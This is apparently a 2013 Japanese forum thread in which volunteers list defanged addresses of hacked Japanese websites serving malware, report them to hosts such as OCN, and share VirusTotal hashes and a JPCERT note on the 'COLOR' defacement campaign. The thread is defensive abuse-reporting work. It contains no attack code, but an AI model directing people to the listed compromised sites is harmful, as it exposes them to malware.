133 名前：名無しさん＠お腹いっぱい。 [2013/06/11(火) 21:52:18.91 .net]: OCNを動かしてくれた皆さん感謝です。
これも明日止まることを期待。。。
134 名前：名無しさん＠お腹いっぱい。 mailto:sage [2013/06/12(水) 02:31:38.43 .net]: それは無理かと
準備期間が必要でしょ（確認作業＋連絡＋猶予期間等々）
135 名前：/名無しさん[1-30] ◆.htmlint.U mailto:sage [2013/06/12(水) 02:54:48.97 .net]: むにゃむにゃねむい
先程フォームからつーほ>>6
すぐにお返事来ました。>>63

>>130-132
お疲れ様です。
>>120とゆーことで診ませんですた
って、いくつかつーほー済みのやうな…
136 名前：名無しさん＠お腹いっぱい。 [2013/06/12(水) 21:47:14.90 .net]: 新規
www11●ocn●ne●jp/~sayacha/
www5●ocn●ne●jp/~fukuzen/
www7●ocn●ne●jp/~sclamp/

再感染（それも初めて見たパターン　新種？）
www16●ocn●ne●jp/~chesnuts/

Toppageだけ対処
www14●ocn●ne●jp/~teamf/touroku●html
www17●ocn●ne●jp/~clover4/cosmet_hair●html
www5●ocn●ne●jp/~sfuru/houshu/houshu_menu●htm
www8●ocn●ne●jp/~aikamu/company●html
www9●ocn●ne●jp/~tada1ppo/06aisatukanben●htm
137 名前：名無しさん＠お腹いっぱい。 mailto:sage [2013/06/13(木) 00:02:58.92 .net]: サーキュレーター探してたらいきなりMSEが開いた。
トロイの木馬ってのを検出して自動で削除画面が出る。
更新しても、そのたびに出る。
俺だけ？それともこの会社のページがだれかにやられたの？

株式会社ナカトミ　｜　45cm工場扇 OPF-45S
www.nakatomi-sangyo.com/fan/opf-45s.html
138 名前：名無しさん＠お腹いっぱい。 mailto:sage [2013/06/13(木) 00:06:50.10 .net]: Trojan:JS BlacoleRef.CZ
と名前はでてる
他にも一緒に入れられる？MSEはそれしか検出してないんだけど
139 名前：名無しさん＠お腹いっぱい。 mailto:sage [2013/06/13(木) 00:25:03.38 .net]: 誤検出っぽい。お騒がせした。
140 名前：/名無しさん[1-30] ◆.htmlint.U mailto:sage [2013/06/13(木) 02:07:47.53 .net]: Aviraがﾋﾟｺｰﾝ
つーほー作業に入ります。。。
141 名前：/名無しさん[1-30] ◆.htmlint.U mailto:sage [2013/06/13(木) 04:10:57.80 .net]: つーほすた
142 名前：名無しさん＠お腹いっぱい。 [2013/06/14(金) 08:09:48.69 .net]: www●horizonz●co●jp
satochokusen●co●jp
143 名前：オルティス・ジャパン mailto:sage [2013/06/14(金) 18:11:52.51 .net]: >>130-132,136
なかなか対応されないので電話してみました
訃報です
OCNはこのスレの巡回を止めたそうです
正規のフロー（フォームから）に従って連絡があれば対応するとのこと
お問い合わせフォーム
http　s://　cgi01.ocn.ne.jp/support/abuse/blog.html

今回は罪滅ぼしの意味合いで私がフォーム発射＆完了
＆担当部署（セキュリティ）に電話
144 名前：/名無しさん[1-30] ◆.htmlint.U mailto:sage [2013/06/14(金) 18:38:13.90 .net]: 皆様
お疲れ様です

>>142
NTTPCコミュニケーションズにめるしました。

>>143
ｶﾞ━━━━━━∑(ﾟдﾟlll)━━━━━━ﾝ
145 名前：/名無しさん[1-30] ◆.htmlint.U mailto:sage [2013/06/15(土) 04:54:48.05 .net]: 閑話休題　漏れがVTに投げた懐かしの8080
https://www.virustotal.com/en/file/64b9d4cf390e37a1017b8a585917c0d21c476cdd59193cc3b28fe46861ffd921/analysis/1262711933/
SHA256:　64b9d4cf390e37a1017b8a585917c0d21c476cdd59193cc3b28fe46861ffd921
File size:　4.5 KB ( 4651 bytes )
File name:　JavaGame.jar
File type:　JAR
Detection ratio:　 8 / 41
Analysis date:　 2010-01-05 15:35:32 UTC
2年半経って誰かが投げてた
https://www.virustotal.com/en/file/64b9d4cf390e37a1017b8a585917c0d21c476cdd59193cc3b28fe46861ffd921/analysis/1340451906/
File size:　4.5 KB ( 4651 bytes )
File name:　jar_cache8170738606501754937.tmp
Detection ratio:　 31 / 42
Analysis date:　 2012-06-23 11:45:06 UTC

同じ日に漏れがVTに投げた8080
https://www.virustotal.com/en/file/a58e3a42daf56fa95d67a157b9c699e43e89e254bcc717ff04d9d19d1ffb40b4/analysis/1262711712/
SHA256:　a58e3a42daf56fa95d67a157b9c699e43e89e254bcc717ff04d9d19d1ffb40b4
File size:　63 bytes ( 63 bytes )
File name:　win.jpg
File type:　unknown
Tags:　exploit
cve-2008-0015
Detection ratio:　 20 / 41
Analysis date:　 2010-01-05 15:38:31 UTC
3年経って誰かが投げたの
https://www.virustotal.com/en/file/a58e3a42daf56fa95d67a157b9c699e43e89e254bcc717ff04d9d19d1ffb40b4/analysis/1363173304/
File name:　win[1]
Detection ratio:　 16 / 45
Analysis date:　 2013-03-13 11:15:04 UTC
定期的に誰かが過去のﾌﾞﾂを診てるんだろか
しかも検出率が下がってるのがあるってのは……
146 名前：/名無しさん[1-30] ◆.htmlint.U mailto:sage [2013/06/15(土) 07:07:05.32 .net]: kohada.2ch.net/test/read.cgi/sec/1370942055/10
いつもお世話になってます。 m(_ _)m
改竄数20倍かぁ。。。
147 名前：名無しさん＠お腹いっぱい。 [2013/06/15(土) 09:23:15.89 .net]: www●miwax●co●jp/
nishikutu●co●jp/
chiyoda-nagoya●co●jp/
kaigokeieigakkai●jp/
www●hanabusa-office●jp/
casinotaro●com/
coscos●info/
orpheus●6●ql●bz/top●html
defi-pro●com/
himesou●jp/
www●eekuchikomi●com/
www●deaipeace●com/
148 名前：名無しさん＠お腹いっぱい。 [2013/06/15(土) 13:03:07.84 .net]: queenuruga●weblog●tc/
77x●info/
bukyu●net/
etaiken●info/
www●etaiken●info/
safetyzone●jp/
curesmile●net/
149 名前：名無しさん＠お腹いっぱい。 mailto:sage [2013/06/15(土) 19:45:29.02 .net]: >>147
⑨defi-pro●com/　連絡済
⑩himesou●jp/　404
⑤⑥⑦⑪⑫　デジロックは放置
>>148
①②③④⑤　デジロックは放置
⑦テラワロス
150 名前：/名無しさん[1-30] ◆.htmlint.U mailto:sage [2013/06/16(日) 03:04:19.30 .net]: お疲れ様です。
こちらからも受け取ってくれるかは不明ですが一通にてつーほーしました。

時間が掛かったので、既に対応してるっぽいのがあるん。。。orz......

>>149
＞ 404
ｗｗｗ草付けるとﾋﾟｺｰﾝ
リダイレクトされてるお
151 名前：名無しさん＠お腹いっぱい。 [2013/06/16(日) 19:29:24.79 .net]: www●chiyoda-nagoya●co●jp/
curesmile●net/
shmj●jp/
152 名前：/名無しさん[1-30] ◆.htmlint.U mailto:sage [2013/06/17(月) 03:16:39.52 .net]: ﾊｹﾞｽｸﾈﾓｲ

お疲れ様です。
>>151
上二つは>>150で一つに纏めてホスティングにめる送付済み

最後のはIPアドレスもあばばばばば
誘導先もあばばばばば
これもIPアドレスあばばばばば
それぞれ分けて二通めるしました。
153 名前：/名無しさん[1-30] ◆.htmlint.U mailto:sage [2013/06/19(水) 18:08:21.47 .net]: Analysis Center (jpcert_ac) on Twitter
https://twitter.com/jpcert_ac/status/343936667083751424
> ここ最近の Web サイト改ざんですが、そのシグネチャである 6桁の 16進数からコードネーム: COLOR として我々は調査・分析を進めています。
https://twitter.com/jpcert_ac/status/345343485387345920
> Color 改ざんですが、現在確認できているパターンは画像のとおりです。他にも情報があれば是非ともご報告ください。
154 名前：名無しさん＠お腹いっぱい。 mailto:sage [2013/06/21(金) 17:05:59.81 .net]: 相次ぐWebサイト改ざん被害遅れる対応-ばびぶべぼBlog
blog.babibubebo.org/archives/648

[ 続きを読む ] / [ 携帯版 ]

read.cgi ver5.27 [feat.BBS2 +1.6] / e.0.2 (02/09/03) / eucaly.net products.
担当:undef